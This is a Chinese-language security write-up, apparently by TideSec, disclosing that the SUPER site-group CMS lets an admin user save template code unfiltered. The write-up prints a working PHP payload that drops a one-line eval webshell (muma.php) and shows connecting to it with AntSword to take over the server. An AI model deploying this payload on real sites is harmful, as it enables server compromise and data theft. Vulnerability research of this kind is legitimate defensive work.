简介
某站群原来是我们内部自己开发使用的一套程序,后来看到很多人有相似的需求,团队决定发布出来免费开源给大家使用。某公司某站群最新版本存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。
适合用在什么场景?推荐有建站基础,懂得SEO的专业人士使用,可用于养域名养权重,关键词流量站、蜘蛛池、企业站乃至个人博客都可以使用。
![1668129031_636da107a986bc1d305e7.jpg 1668129031_636da107a986bc1d305e7.jpg](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2022/11/1668129031_636da107a986bc1d305e7.jpg)
下载程序
官网下载:https://www.cmssuper.com/
下载地址点击以后跳转此页面,点击下载谷歌是没有反应的,360和ie是可以的,谷歌浏览器报错
Mixed Content: The site at '<URL>' was loaded over a secure connection, but the file at '<URL>' was loaded over an insecure connection. This file should be served over HTTPS. This download has been blocked. See <URL> for more details.
提示遇到https和http不兼容问题
![图片[2]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157878.png)
![图片[3]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157879.png)
打开调试,直接点击url就可以下载或者是改成https点击下载就可以下载了。但是官方审核到了三级验证中了,点击下载没反应就直接给驳回了。
![图片[4]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157880.jpeg)
然后我又重新在文档做了说明,并下载了安装包放到附件里边重新提交的,又要从一级审核开始。
![null 图片[5]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157881.png)
官方大人审核,不敢多言,直接上过程。
搭建过程
下载安装包安装完以后, 此时登录后台程序:
后台效果
![图片[6]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157882.png)
进入后台以后:点击系统设置->模板风格->可以下载其他模板以后,点击编辑模板,站点选择该模板。
![图片[7]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157883.png)
复制此段程序:找到首页模板,复制进去,点击保存就可以了。
![图片[8]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157884.png)
保存完,运行前端,会在根目录下生成文件。
![图片[9]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157885.png)
会在根目录下生成muma.php
恶意代码:
<?php$file=fopen("muma.php","w");//根目录创建muma.php文件fwrite($file,'<');fwrite($file,'?');fwrite($file,'php');fwrite($file,' @eval($_POST["cmd"]);');fwrite($file,'?>');?>
运行完以后,域名+muma.php
![图片[10]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-16681578851.png)
使用蚁剑链接木马,获得服务器权限:
![图片[11]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157886.png)
查看数据配置信息:
![图片[12]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-16681578861.png)
代码分析
点击保存,获取到这个地址。
![图片[13]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157887.png)
![图片[14]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157888.png)
![图片[15]-SUPER站群命令执行之官方审核-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190926-1668157892.png)
找到保存方法,获取body内容,stripslashes 函数对内容反斜杠处理,对非法内容并没有过滤。
至此,通过系统后台文件编辑,通过非法代码,运行文件,实现写入木马程序执行,拿到了服务器全部权限、源码,以及数据库信息,造成了很严重的后果。
E
N
D
本文作者:TideSec
本文为安全脉搏专栏作者发布:https://www.secpulse.com/archives/190926.html
请登录后查看评论内容